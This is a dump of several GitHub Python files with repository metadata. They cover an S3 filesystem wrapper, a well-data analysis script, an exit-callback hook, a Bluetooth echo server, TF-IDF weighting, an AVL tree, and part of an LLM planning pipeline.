prefix\n\n Some notes on how the optional args of Bucket.objects.filter work,\n because couldn't find sufficient docs and did some manual trying:\n - Prefix: works as expected: drop any entry if not key.startswith(Prefix)\n - Delimiter: it appears to be dropping entries if Delimiter in key\n - Marker: return an entry only if it is lexicographically after Marker\n \"\"\"\n assert prefix.startswith(self._keyPrefix), (prefix, self._keyPrefix)\n\n return self._getBucket().objects.filter(Prefix=prefix)\n\n def iterateFiles(self, prefix=\"\", subpathFilter=None, returnModtimesAndSizes=False):\n \"\"\"Returns a list of all the files that start with the given prefix.\n\n Directories are not returned.\n\n Note: Implementations of the FileSystem interface should\n override the implementation if it can be done more efficiently.\n\n If 'subpathFilter' is passed, then at each subdirectory, we will call the\n function and if it returns False, we will skip that directory. subpathFilter\n must also accept paths that return files.\n\n If 'returnModtimesAndSizes', then return pairs of (key, modTimestamp, fileSize).\n \"\"\"\n for path in self.iterateObjects(\n prefix=prefix,\n subpathFilter=subpathFilter,\n returnModtimesAndSizes=returnModtimesAndSizes,\n ):\n yield path\n\n def iterateObjects(\n self,\n prefix=\"\",\n subpathFilter=None,\n returnModtimesAndSizes=False,\n recursive=True,\n includeDirs=False,\n ):\n if includeDirs and returnModtimesAndSizes:\n raise Exception(\"includeDirs and returnModtimesAndSizes cannot both be True\")\n\n prefix = prefix.lstrip(FileSystem.sep)\n\n searchedPrefix = self._pathToKey(prefix)\n\n if subpathFilter is None and recursive and not includeDirs:\n objects = self._listprefix(searchedPrefix)\n\n for o in objects:\n if o.key.startswith(searchedPrefix):\n if returnModtimesAndSizes:\n yield (self._keyToPath(o.key), o.last_modified.timestamp(), o.size)\n else:\n yield self._keyToPath(o.key)\n else:\n client = self._getClient()\n paginator = client.get_paginator(\"list_objects\")\n\n for result in paginator.paginate(\n Bucket=self._bucketname,\n Delimiter=\"/\",\n Prefix=searchedPrefix + (\"/\" if prefix[-1:] == \"/\" else \"\"),\n ):\n for key in result.get(\"Contents\") or []:\n path = self._keyToPath(key[\"Key\"])\n if subpathFilter is None or subpathFilter(path):\n if returnModtimesAndSizes:\n yield path, key[\"LastModified\"].timestamp(), key[\"Size\"]\n else:\n yield path\n\n for commonPrefix in result.get(\"CommonPrefixes\") or []:\n subdir = commonPrefix.get(\"Prefix\").rstrip(FileSystem.sep)\n path = self._keyToPath(subdir)\n if subpathFilter is None or subpathFilter(path):\n if includeDirs:\n yield path\n\n if recursive:\n if self.withTrailingSep(path) != prefix:\n for path in self.iterateObjects(\n prefix=self.withTrailingSep(path),\n subpathFilter=subpathFilter,\n returnModtimesAndSizes=returnModtimesAndSizes,\n recursive=True,\n includeDirs=includeDirs,\n ):\n yield path\n\n def listFiles(self, prefix=\"\"):\n return list(self.iterateFiles(prefix=prefix))\n\n def listdir(self, path=\"\", *, recursive=False, maxEntries=None):\n path = self.withTrailingSep(path)\n prefix = self.withTrailingSep(self._pathToKey(path))\n keysWithPrefix = self._listprefix(prefix)\n\n if path != \"\" and len(list(keysWithPrefix.limit(1))) == 0:\n # Look at isdir for an explanation of the 2nd part of the condition\n raise OSError(f\"Not a directory '{path}'\")\n\n if maxEntries is None:\n return [\n obj\n for obj in self.iterateObjects(\n prefix=path, recursive=recursive, includeDirs=True\n )\n ]\n\n else:\n keys = []\n for obj in self.iterateObjects(prefix=path, recursive=recursive, includeDirs=True):\n keys.append(obj)\n if len(keys) >= maxEntries:\n break\n\n return keys\n\n def get(self, path) -> bytes:\n try:\n self._loadIt(path)\n except Exception as e:\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n data = io.BytesIO()\n key = self._pathToKey(path)\n self._getInto(key, data)\n return data.getvalue()\n\n def getInto(self, path, byteStream):\n try:\n self._loadIt(path)\n except Exception as e:\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n self._checkByteStreamForGet(byteStream)\n\n key = self._pathToKey(path)\n self._getInto(key, byteStream)\n\n @retryIfIrrelevantFailure\n def _getInto(self, key, byteStream):\n byteStream.seek(0)\n self._getClient().download_fileobj(self._bucketname, key, byteStream)\n\n @retryIfIrrelevantFailure\n def set(self, path, content) -> None:\n self._checkContentInputTypeForSet(content)\n\n key = self._pathToKey(path)\n if isinstance(content, bytes):\n byteStream = CloseProtectedStream(io.BytesIO(content))\n\n else:\n assert isinstance(content, io.IOBase), type(content)\n\n byteStream = CloseProtectedStream(content)\n self._checkByteStreamForSet(byteStream)\n\n try:\n self._setByteStream(key, byteStream)\n except Exception as e:\n raise OSError(f\"Failed to set {path} with error {str(e)}\") from e\n\n def _setByteStream(self, key, byteStream):\n byteStream.seek(0, io.SEEK_END)\n byteStream.seek(0)\n self._getClient().upload_fileobj(byteStream, Bucket=self._bucketname, Key=key)\n\n def rm(self, path) -> None:\n try:\n o = self._loadIt(path)\n except Exception as e:\n raise OSError(f\"Failed not accessible: '{path}'\") from e\n\n @retryIfIrrelevantFailure\n def deleteIt():\n o.delete()\n\n try:\n deleteIt()\n\n except Exception as e:\n raise OSError(str(e)) from e\n\n def __str__(self):\n return f\"S3FileSystem(bucket={self._bucketname}, keyPrefix={self._keyPrefix})\"\n","repo_name":"APrioriInvestments/filesystem","sub_path":"filesystem/s3_filesystem.py","file_name":"s3_filesystem.py","file_ext":"py","file_size_in_byte":15393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"5626306060","text":"import math\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom pandas import DataFrame\n\ndef info(df: pd.DataFrame, sub_df: pd.DataFrame, target_name: str) -> float:\n if df[target_name].nunique() == 0:\n return 0\n interval_count = 1 + int(math.log(df[target_name].nunique(), 2))\n left_border = df[target_name].min()\n right_border = df[target_name].max()\n step = (right_border - left_border) / interval_count\n\n vals_in_interval = [0] * interval_count\n value_counts = sub_df[target_name].value_counts()\n unq_vals = list(value_counts.index)\n if step != 0:\n for i in range(len(unq_vals)):\n interval_index = int((unq_vals[i] - left_border) // step)\n if interval_index == interval_count:\n interval_index -= 1\n vals_in_interval[interval_index] += value_counts[unq_vals[i]]\n\n s = 0.0\n for val in value_counts:\n tmp = val / sub_df[target_name].count()\n if tmp != 0:\n s += tmp * math.log(tmp, 2)\n return -s\n\n\ndef info_a(df: pd.DataFrame, attr_name: str, target_name: str) -> float:\n if df[attr_name].nunique() == 0:\n return 0\n interval_count = 1 + int(math.log(df[attr_name].nunique(), 2))\n left_border = df[attr_name].min()\n right_border = df[attr_name].max()\n step = (right_border - left_border) / interval_count\n left_borders = []\n for i in range(interval_count):\n left_borders.append(left_border + i * step)\n\n s = 0.0\n for border in left_borders:\n sub_df = df.loc[((df[attr_name] >= border) & (df[attr_name] < border + step)) |\n (df[attr_name] == right_border)]\n s += info(df, sub_df, target_name)\n return s\n\n\ndef split_info(df: pd.DataFrame, attr_name: str) -> float:\n s = 0.0\n for val in df[attr_name].value_counts():\n tmp = val / df[attr_name].count()\n s += tmp * math.log(tmp, 2)\n return s\n\n\ndef gain(df: pd.DataFrame, attr_name: str, target_name: str) -> float:\n return info(df, df, target_name) - info_a(df, attr_name, target_name)\n\n\ndef gain_ratio(df: pd.DataFrame, attr_name: str, target_name: str) -> float:\n return gain(df, attr_name, target_name) / split_info(df, attr_name)\n\ndef data_set_gain_ratio(df: pd.DataFrame, target_name: str, num_target_columns: int) -> pd.Series:\n gain_ratio_list = []\n for col_name in df.columns[0:-num_target_columns]:\n gain_ratio_list.append(gain_ratio(df, col_name, target_name))\n return pd.Series(gain_ratio_list, index=df.columns[0:-num_target_columns])\n\nPRINT_ALLOWED = True\nMAX_MISSES_PERCENTS = 45\nCOLS = 1\nROWS = 0\n\n\ndef show_corr(df: DataFrame):\n width = 30\n height = 10\n sns.set(rc={'figure.figsize': (width, height)})\n sns.heatmap(df.corr(), annot=True, linewidths=3, cbar=False)\n plt.show()\n\n\ndef show_distributions(df: DataFrame, df_stat: DataFrame):\n for i in df.columns:\n plt.figure(i)\n sns.histplot(df[i], kde=True, stat=\"density\")\n interquantile_range = df_stat.loc['Interquantile range'][i]\n plt.axvline(df_stat.loc['Quantile 1'][i] - 1.5 * interquantile_range, color=\"indigo\", ls='--')\n plt.axvline(df_stat.loc['Quantile 1'][i], color=\"dodgerblue\", ls='--')\n plt.axvline(df_stat.loc['Average'][i], color=\"red\", ls='--')\n plt.axvline(df_stat.loc['Median'][i], color=\"goldenrod\", ls='--')\n plt.axvline(df_stat.loc['Quantile 3'][i], color=\"dodgerblue\", ls='--')\n plt.axvline(df_stat.loc['Quantile 3'][i] + 1.5 * interquantile_range, color=\"indigo\", ls='--')\n plt.show()\n\n\ndef get_data_frame() -> DataFrame:\n df = pd.read_excel('ID_data_mass_18122012.xlsx', sheet_name='VU', skiprows=[0,2])\n df = df.drop(['Unnamed: 0', 'Unnamed: 1'], axis=COLS)\n return df\n\n\ndef get_frame_statistics(df: DataFrame) -> DataFrame:\n col_len = len(df.index)\n col_filled_len = df.count()\n filled_part = ((col_len - col_filled_len) / col_len) * 100\n minimum = df.min()\n q1 = df.quantile(q=0.25, )\n average = df.mean()\n median = df.median()\n q3 = df.quantile(q=0.75, )\n maximum = df.max()\n standard_deviation = df.std()\n unique_count = df.nunique()\n interquantile_range = q3 - q1\n frame = pd.concat([col_filled_len, filled_part, minimum, q1, average, median, q3, maximum, standard_deviation,\n unique_count, interquantile_range], axis=1, join=\"inner\")\n frame = frame.T\n f = pd.DataFrame(frame)\n\n f.index = ['Count', 'Unfilled percentage', 'Minimum', 'Quantile 1', 'Average', 'Median', 'Quantile 3',\n 'Maximum', 'Standard deviation', 'Unique count', 'Interquantile range']\n return f\n\n\ndef remove_cols_with_many_misses(df: DataFrame, targets: list[str]) -> DataFrame:\n too_little_data_cols = []\n for col in df.columns:\n unfilled = df[col]['Unfilled percentage']\n if unfilled >= MAX_MISSES_PERCENTS and not targets.__contains__(col):\n too_little_data_cols.append(col)\n if PRINT_ALLOWED:\n print('Drop columns with many misses: ', too_little_data_cols)\n return df.drop(too_little_data_cols, axis=COLS)\n\n\ndef remove_cols_with_little_unique(df: DataFrame, targets: list[str]) -> DataFrame:\n too_little_unique_cols = []\n for col in df.columns:\n unique_count = df[col]['Unique count']\n if unique_count == 1 and not targets.__contains__(col):\n too_little_unique_cols.append(col)\n if PRINT_ALLOWED:\n print('Drop columns with little unique: ', too_little_unique_cols)\n return df.drop(too_little_unique_cols, axis=COLS)\n\n\ndef fill_blanks(df: DataFrame, df_stat: DataFrame, targets: List[str]) -> DataFrame:\n for col in df.columns:\n if col in targets:\n continue\n for i in df[col].keys():\n if df[col][i] is None or np.isnan(df[col][i]):\n df[col][i] = df_stat[col]['Median']\n return df\n\ndef combine_kgf(df: DataFrame) -> DataFrame:\n for row_num in df['КГФ.1'].keys():\n if not np.isnan(df['КГФ.1'][row_num]):\n df['КГФ'][row_num] = df['КГФ.1'][row_num] * 1000\n return df.drop('КГФ.1', axis=COLS)\n\n\ndef remove_empty_target(df: DataFrame, targets: List[str]) -> DataFrame:\n to_remove = []\n for i in df['КГФ'].keys():\n no_targets = True\n for col in targets:\n if not (df[col][i] is None or np.isnan(df[col][i])):\n no_targets = False\n if no_targets:\n to_remove.append(i)\n print(\"Drop \", len(to_remove), \" rows: \", to_remove)\n for row in to_remove:\n df = df.drop(row, axis=ROWS)\n return df\n\n\ndef show_gain_ratio(df: DataFrame, df_stat: DataFrame, target: str, targets: list[str]):\n df_igr = data_set_gain_ratio(df, target, len(targets)).to_frame()\n df_igr.plot(kind = 'barh')\n plt.show()\n\n\ndef main():\n mpl.use('TkAgg')\n pd.set_option('display.max_rows', None)\n pd.set_option('display.max_columns', None)\n pd.set_option('display.width', None)\n df = get_data_frame()\n df = combine_kgf(df)\n # print(df.describe())\n targets = ['G_total', 'КГФ']\n df_stat = get_frame_statistics(df)\n df_stat = remove_cols_with_many_misses(df_stat, targets)\n df_stat = remove_cols_with_little_unique(df_stat, targets)\n df = df.filter(items=df_stat)\n df = remove_empty_target(df, targets)\n df_stat = df_stat.filter(items=df)\n df = fill_blanks(df, df_stat, targets)\n # show_distributions(df, df_stat) # trash in Ro_c\n # df = df.drop(151, axis=ROWS)\n # show_corr(df)\n df_stat = get_frame_statistics(df)\n # show_corr(df)\n print(df_stat)\n # Рзаб and Рзаб1 have almost the same correlations\n # Also Руст and Руст1\n # By IGR defined that Руст.1 > Руст, Рзаб.1 > Рзаб, Дебит воды > Дебит воды.1\n df = df.drop(['Рзаб', 'Руст', 'Дебит воды.1'], axis=COLS)\n df_stat = df_stat.filter(items=df)\n\n df_g_total = df.drop(df[df['G_total'].isnull()].index)\n df_g_total_stat = get_frame_statistics(df_g_total)\n show_gain_ratio(df_g_total, df_g_total_stat, 'G_total', targets) # Рсб, Рсб.1\n df_kgf = df.drop(df[df['КГФ'].isnull()].index)\n df_kgf_stat = get_frame_statistics(df_kgf)\n show_gain_ratio(df_kgf, df_kgf_stat, 'КГФ', targets) # Рсб, Рсб.1\n # show_distributions(df, df_stat)\n df_stat = df_stat.filter(items=df)\n df.to_excel(\"result.xlsx\")\n df_stat.to_excel(\"statistics.xlsx\")\n # Рлин, Рсб .1\n df_1 = df.loc[[1, 2, 3, 24, 32]]\n df_2 = pd.merge(df, df_1, indicator=True, how='outer').query('_merge==\"left_only\"').drop('_merge', axis=1)\n\n df_1.to_csv('testing_dataset.csv')\n df_2.to_csv('training_dataset.csv')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MaximuSG140/neural-networks-labs","sub_path":"dataset_analysis/dataset_analysis.py","file_name":"dataset_analysis.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44249732251","text":"# coding:utf-8\nimport threading\n\n# 退出调用列表\n__exits__ = []\n# 原本退出的回调函数\n__old_shutdown__ = threading._shutdown\n\n\ndef waitexit(*kw, **kwargs):\n '''\n 该注解是给开发者使用的,修饰函数,并且传入参数\n :param kw: 传入参数\n :param kwargs: 传入键值对参数\n :return: 返回被装饰过的函数\n '''\n global __exits__\n\n def cut(func=None):\n # 一个回调对象,搞不好傻屌开发者可能会需要多个回调函数\n __exits__.append((func, kw, kwargs))\n return func\n\n return cut\n\n\ndef exit_callback():\n '''\n 该函数并不是给开发者用的\n :return:\n '''\n global __exits__\n global __old_shutdown__\n while __exits__:\n func, kw, kwargs = __exits__.pop()\n try:\n func(*kw, **kwargs)\n except:\n pass\n return __old_shutdown__()\n\n\n# 设置销毁回调\nsetattr(threading, \"_shutdown\", exit_callback)\n\nif __name__ == '__main__':\n @waitexit(\"qwertyuiopoiuytrew\")\n def exits(info=\"\"):\n print(\"这个傻屌py文件已经结束执行了\")\n print(\"最后传入的参数是:%s\" % info)\n\n","repo_name":"c0cc/lscore","sub_path":"lscore/libs/hook/exit_cut.py","file_name":"exit_cut.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"74953374915","text":"import bluetooth\r\nfrom socket import *\r\n#server\r\nhostMACAddress = '34:DE:1A:31:2B:52' # The MAC address of a Bluetooth adapter on the server. The server might have multiple Bluetooth adapters.\r\nport = 4\r\nbacklog = 1\r\nsize = 1024\r\ns = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\r\n# s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\ns.bind((hostMACAddress, port))\r\ns.listen(backlog)\r\ntry:\r\n client, clientInfo = s.accept()\r\n while 1:\r\n data = client.recv(size)\r\n if data:\r\n print(data)\r\n client.send(data) # Echo back to client\r\nexcept:\t\r\n print(\"Closing socket\")\r\n client.close()\r\n s.close()","repo_name":"ddhuy77/COSC2790_PIoT_Assignment_1","sub_path":"bluetooth2.py","file_name":"bluetooth2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27522822603","text":"from docs import Dokumen\nimport math\nfrom collections import defaultdict\n\n\nclass PembobotanKata:\n def __init__(self):\n self.docs = Dokumen().documents_dictionary()\n self.N = len(self.docs)\n self.avg_len = sum([len(doc) for doc in self.docs.values()])/len(self.docs)\n self.inv_idx = Dokumen().inverted_index()\n\n def tf_idf_query(self, q_terms):\n fqt = {}\n for term in q_terms:\n fqt[term] = fqt.get(term, 0) + 1\n tf_idf_query = {}\n id = 1\n for term in fqt.keys():\n query_tf = math.log10(fqt[term]) + 1\n print(f'{id}. {term}')\n df = len(self.inv_idx[term])\n print(f'df = {df}')\n if df != 0:\n query_idf = math.log(self.N / df)\n id += 1\n tf_idf_query[term] = query_tf * query_idf\n return tf_idf_query\n\n def tf_idf_doc(self, term, docID):\n td = self.docs[docID].count(term)\n df = len(self.inv_idx[term]) # df is the number of documents a term occurs in\n tf = math.log10(td) + 1 # the frequency of the word t in document d\n idf = math.log(self.N/df)\n w = tf * idf\n return w\n\n def create_tf_idf(self):\n tf_idf = defaultdict(dict)\n for term in set(self.inv_idx.keys()):\n for docid in self.inv_idx[term]:\n tf_idf[term][docid] = self.tf_idf_doc(term, docid)\n return tf_idf\n","repo_name":"ErwinSputra/CLIR-QE","sub_path":"term_weighting.py","file_name":"term_weighting.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70310292994","text":"class Node(object):\n def __init__(self, data):\n self.data = data\n self.height = 0\n self.left_child = None\n self.right_child = None\n\n\nclass AVLTree(object):\n def __init__(self):\n self.root = None\n\n def calc_height(self, node):\n if node is None:\n return -1\n\n return node.height\n\n def calc_balance(self, node):\n \"\"\"\n if the return value is > 1 it means we have left heavy tree --> call right rotation\n if the return value is < -1 it means we have right heavy tree --> call left rotation\n note: sometimes it will require both left/right rotation and then right/left rotation\n \"\"\"\n if node is None:\n return 0\n return self.calc_height(node.left_child) - self.calc_height(node.right_child)\n\n def insert(self, data):\n self.root = self.__insert_node(data, self.root)\n\n def __insert_node(self, data, node):\n if node is None:\n return Node(data)\n\n # insert the new node\n if data < node.data:\n node.left_child = self.__insert_node(data, node.left_child)\n else:\n node.right_child = self.__insert_node(data, node.right_child)\n\n self.__update_node_height(node)\n\n # fix AVL property violation\n return self.__settle_violation(data, node)\n\n def __settle_violation(self, data, node):\n balance = self.calc_balance(node)\n\n # case 1 -> doubly left heavy situation\n if balance > 1 and data < node.left_child.data:\n print(\"Run doubly left heavy condition\")\n return self.__right_rotation(node)\n elif balance < -1 and data > node.right_child.data:\n print(\"Run doubly right heavy condition\")\n return self.__left_rotation(node)\n elif balance > 1 and data > node.left_child.data:\n print(\"Run left right heavy situation\")\n node.left_child = self.__left_rotation(node.left_child)\n return self.__right_rotation(node)\n elif balance < -1 and data < node.right_child.data:\n print(\"Run right left heavy situation\")\n node.right_child = self.__right_rotation(node.right_child)\n return self.__left_rotation(node)\n\n return node\n\n def __right_rotation(self, node):\n \"\"\"\n O(1) time complexity\n \"\"\"\n print(\"rotating to the right, node = \", node.data)\n temp_node = node.left_child\n t = temp_node.right_child\n\n temp_node.right_child = node\n node.left_child = t\n\n self.__update_node_height(node)\n self.__update_node_height(temp_node)\n\n return temp_node\n\n def __left_rotation(self, node):\n \"\"\"\n O(1) time complexity\n \"\"\"\n print(\"rotating to the left, node = \", node.data)\n temp_node = node.right_child\n t = temp_node.left_child\n\n temp_node.left_child = node\n node.right_child = t\n\n self.__update_node_height(node)\n self.__update_node_height(temp_node)\n\n return temp_node\n\n def travers(self):\n if self.root is not None:\n self.__travers_in_order(self.root)\n else:\n print(\"BST is empty\")\n\n def __travers_in_order(self, node):\n \"\"\"\n Left sub-tree -> root -> right sub-tree\n \"\"\"\n if node.left_child is not None:\n self.__travers_in_order(node.left_child)\n\n print(\"{}\".format(node.data))\n\n if node.right_child is not None:\n self.__travers_in_order(node.right_child)\n\n def remove(self, data):\n if self.root is not None:\n self.__remove_node(data, self.root)\n else:\n print(\"BST is empty\")\n\n def __remove_node(self, data, node):\n if node is None:\n return node\n\n if data < node.data:\n node.left_child = self.__remove_node(data, node.left_child)\n elif data > node.data:\n node.right_child = self.__remove_node(data, node.right_child)\n else:\n if node.left_child is None and node.right_child is None:\n print(\"removing a leaf node\")\n del node\n return None\n elif node.left_child is None:\n print(\"removing a node with right child\")\n temp_node = node.right_child\n del node\n return temp_node\n elif node.right_child is None:\n print(\"removing a node with left child\")\n temp_node = node.left_child\n del node\n return temp_node\n else:\n print(\"removing a node with children\")\n temp_node = self.__max(node.left_child)\n node.data = temp_node.data\n node.left = self.__remove_node(node.data, node.left_child)\n\n if node is None:\n return node\n\n self.__update_node_height(node)\n\n return self.__settle_violation(data, node)\n\n def __update_node_height(self, node):\n node.height = max(self.calc_height(node.left_child), self.calc_height(node.right_child)) + 1\n\n def __max(self, node):\n if node.right is not None:\n return self.__max(node.right)\n else:\n return node\n\n def __min(self, node):\n if node.left is not None:\n return self.__min(node.left)\n else:\n return node\n\n\nif __name__ == \"__main__\":\n tree = AVLTree()\n tree.insert(10)\n tree.insert(20)\n tree.insert(30)\n\n tree.travers()\n\n tree.insert(40)\n tree.insert(50)\n tree.insert(60)\n\n tree.travers()\n\n tree2 = AVLTree()\n tree2.insert(60)\n tree2.insert(50)\n tree2.insert(40)\n\n tree2.travers()\n\n tree2.insert(30)\n tree2.insert(20)\n tree2.insert(10)\n\n tree2.travers()\n\n tree3 = AVLTree()\n tree3.insert(50)\n tree3.insert(70)\n tree3.insert(60)\n\n tree3.travers()\n\n tree4 = AVLTree()\n tree4.insert(50)\n tree4.insert(30)\n tree4.insert(40)\n tree4.remove(30)\n\n tree4.travers()\n\n","repo_name":"avi3tal/knowledgebase","sub_path":"ds/Tree/AVLTree/avlt.py","file_name":"avlt.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37241773838","text":"import csv\nimport pdb\nimport json\nfrom utils import *\nimport argparse\nfrom tqdm import tqdm\n\nopenai_setapi()\n\ndef mine_actions(args):\n # get converted questions\n fname = \"./data/processed/quality_train_q.csv\"\n questions = load_questions(fname)\n qfilter = load_question_filter()\n questions = {qid: questions[qid] for qid in questions if qid not in qfilter['train_long']}\n print(f\"number of questions: {len(questions)}\")\n prompt = load_prompt(f\"./prompt_bank/mine_actions.txt\")\n\n # mine actions\n with open(args.output_file, \"w+\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"question\"])\n writer.writeheader()\n ret = []\n for qid in tqdm(questions):\n item = questions[qid]\n this_ret = {\"qid\": qid}\n this_question = item['question']\n this_prompt = prompt.replace(\"{{question}}\", this_question)\n response = get_response(this_prompt,\n model=model_name,\n max_tokens=512,\n frequency_penalty=0.0,\n temperature=0.0,\n top_p=0.0,\n stop=[\"<|im_end|>\", \"\\n\\n\\n\", \"---\"])\n this_ret['question'] = response\n ret.append(this_ret)\n writer.writerow(this_ret)\n\n # aggregate actions\n all_new_actions = []\n for item in ret:\n this_actions = item['question']\n try:\n new_actions = this_actions[:this_actions.index(\"My sequence of actions:\")]\n new_actions = new_actions[new_actions.index(\"\\n\")+1:]\n new_actions = [x.strip() for x in new_actions.split(\"\\n\") if \"none\" not in x.lower() and len(x.strip()) > 0]\n all_new_actions.extend(new_actions)\n except:\n continue\n all_new_actions = set(all_new_actions)\n print(f\"number of actions: {len(all_new_actions)}\")\n \n merged_actions = {}\n for action in all_new_actions:\n action_name = action.split(\":\")[0].strip()\n definition = action.split(\":\")[1].strip()\n merged_actions[action_name] = definition\n\n out_str = ''\n for action in merged_actions:\n out_str += f\"{action.lstrip('-').strip()}\\t#{merged_actions[action]}\\n\"\n \n with open(args.output_file, \"w\") as f:\n f.write(out_str)\n\ndef simplify_actions(args):\n input_actions = load_text(args.input_file).split('\\n')\n simplify_prompt = load_prompt(f\"./prompt_bank/simplify_actions.txt\")\n shard_size = args.shard_size\n num_shards = len(input_actions) // shard_size + 1\n output = ''\n for i in range(num_shards):\n this_shard = input_actions[i*shard_size : min((i+1)*shard_size, len(input_actions))]\n this_total_actions = '\\n'.join(this_shard)\n this_prompt = simplify_prompt.replace(\"{action_list}\", this_total_actions)\n response = get_response(this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=2048)\n output += response.strip() + \"\\n\"\n \n with open(args.output_file, \"w\") as f:\n f.write(output)\n\ndef load_actions():\n global all_actions\n all_actions = {}\n\n with open(f\"./output/mined_actions_simplified_example.txt\", \"r\") as f:\n for line in f:\n try:\n lsp = line.split(\"#\")\n action_type = lsp[0][:lsp[0].index(\"(\")]\n action_args = lsp[0][lsp[0].index(\"(\")+1:lsp[0].index(\")\")].split(\",\")\n action_def = lsp[1].strip()\n if action_type in all_actions:\n print(f\"Warning: {action_type} already exists\")\n all_actions[action_type] = {\"args\": [x.strip() for x in action_args], \"action_def\": action_def}\n except:\n pdb.set_trace()\n\n print(len(all_actions))\n\ndef get_option_str(question):\n options = ''\n for idx in range(1, 5):\n option = question[f'option_{idx}']\n options += f'{option_map[idx]}: {option}\\n'\n return options\n\ndef load_article(fname):\n with open(fname, \"r\") as f:\n data = f.readlines()\n data = [json.loads(x) for x in data]\n # get rid of excessive newlines\n data = {x['article_id']: process_article(x['article'], chunk_size=-1) for x in data}\n return data\n\ndef load_quality_data(this_split, this_type):\n qfilter = load_question_filter()\n if this_split == \"dev\":\n articles = load_article(\"./data/raw/QuALITY.v1.0.1.htmlstripped.dev\")\n questions = load_questions(\"./data/processed/quality_dev_q.csv\")\n if this_type == \"ctx_eval_long\":\n long_qids = qfilter['dev_long']\n elif this_type == \"ctx_eval_short\":\n long_qids = qfilter['dev_short']\n else:\n raise ValueError(f\"Unknown example type {this_type}\")\n questions = {qid:questions[qid] for qid in questions if qid in long_qids}\n elif this_split == \"train\":\n articles = load_article(\"./data/raw/QuALITY.v1.0.1.htmlstripped.train\")\n questions = load_questions(\"./data/processed/quality_train_q.csv\")\n if this_type == \"ctx_eval_long\":\n long_qids = qfilter['train_long']\n else:\n raise ValueError(f\"Unknown example type {this_type}\")\n questions = {qid:questions[qid] for qid in questions if qid in long_qids}\n elif this_split == \"train-demo\":\n articles = load_article(\"./data/raw/QuALITY.v1.0.1.htmlstripped.train\")\n questions = load_questions(\"./data/processed/quality_train_q.csv\")\n qids = qfilter['train_demo']\n questions = {qid:questions[qid] for qid in questions if qid in qids}\n else:\n raise ValueError(f\"Unknown split {this_split}\")\n print(f\"Loaded {len(articles)} articles and {len(questions)} questions\")\n return articles, questions\n\ndef load_csv(fname):\n with open(fname, \"r\") as f:\n reader = csv.DictReader(f)\n ret = {}\n for row in reader:\n ret[row[\"qid\"]] = row\n return ret\n\nclass Action(object):\n def __init__(self, question, entire_plan, action_type, detailed_action, action_def=None, current_action=None):\n\n global all_actions\n self.this_action = action_type\n self.args = all_actions[action_type][\"args\"]\n self.action_def = all_actions[action_type][\"action_def\"] if action_def is None else action_def\n original_action = f\"{action_type}({','.join(self.args)})\"\n self.entire_plan = [x for x in entire_plan.split(\"\\n\\n\") if len(x.strip()) > 0][1]\n self.question = question\n self.current_action = current_action\n self.this_prompt = \"\"\n if \"CTX\" in original_action:\n self.this_prompt += \"{{CTX}}\\n---\\n\\nPlease read the above text first, and then follow the instructions below.\\n\\n\"\n\n self.this_prompt += f\"[Instruction]\\nAction:\\n\\n{original_action} : {self.action_def}\\n\\nthis_args\\n---\\n\\n[Answer]\\n(list or paragraph(s), please be thorough)\\n({detailed_action})\\n\" \n\n def execute(self, *args):\n try:\n assert len(args) == len(self.args)\n\n if 'current_action' in self.this_prompt:\n self.this_prompt = self.this_prompt.replace('current_action', self.current_action)\n\n if \"{{CTX}}\" in self.this_prompt:\n self.this_prompt = self.this_prompt.replace(\"{{CTX}}\", args[0])\n args = args[1:]\n self.args = self.args[1:]\n\n if 'current_action' not in self.this_prompt:\n args_str = \"\"\n for i in range(len(args)):\n args_str += f\"{self.args[i]} = {args[i]}\\n\"\n self.this_prompt = self.this_prompt.replace(\"this_args\", args_str)\n \n response = get_response(self.this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=512)\n except Exception as e:\n print(e)\n print(self.this_prompt)\n print(args)\n print(self.args)\n return response\n \n def __call__(self, *args):\n if self.this_action != \"CONCAT\":\n return self.execute(*args)\n else:\n return \"\\n\".join(args)\n\ndef generate_plan(question, \n invalid_plan=None, \n error_message=None, \n all_error_messages=None, \n debug=False, \n plan_prompt=None,\n plan_prompt_invalid=None):\n\n action_list = load_text(\"./output/mined_actions_simplified_example.txt\")\n\n if invalid_plan is None:\n plan_generation_prompt = load_prompt(plan_prompt)\n plan_generation_prompt = plan_generation_prompt.format(action_list=action_list, question=question)\n else:\n plan_generation_prompt = load_prompt(plan_prompt_invalid)\n plan_generation_prompt = plan_generation_prompt.format(action_list=action_list, question=question, invalid_plan=invalid_plan, error_message=error_message, all_error_messages='\\n\\t' + '\\n\\t'.join(all_error_messages))\n if debug:\n print(plan_generation_prompt)\n response = get_response(plan_generation_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=256)\n if debug:\n print(response)\n\n plan = response\n return plan\n\ndef parse_plan(plan):\n \"\"\"\n Input: plan of the format:\n New actions:\n - new_action_1(args) : one sentence of explanation\n\n output_1 = action_1(args for action_1) : explanation\n output_2 = action_2(args for action_2) : explanation\n ...\n\n Output (if valid plan):\n is_valid\n actions: 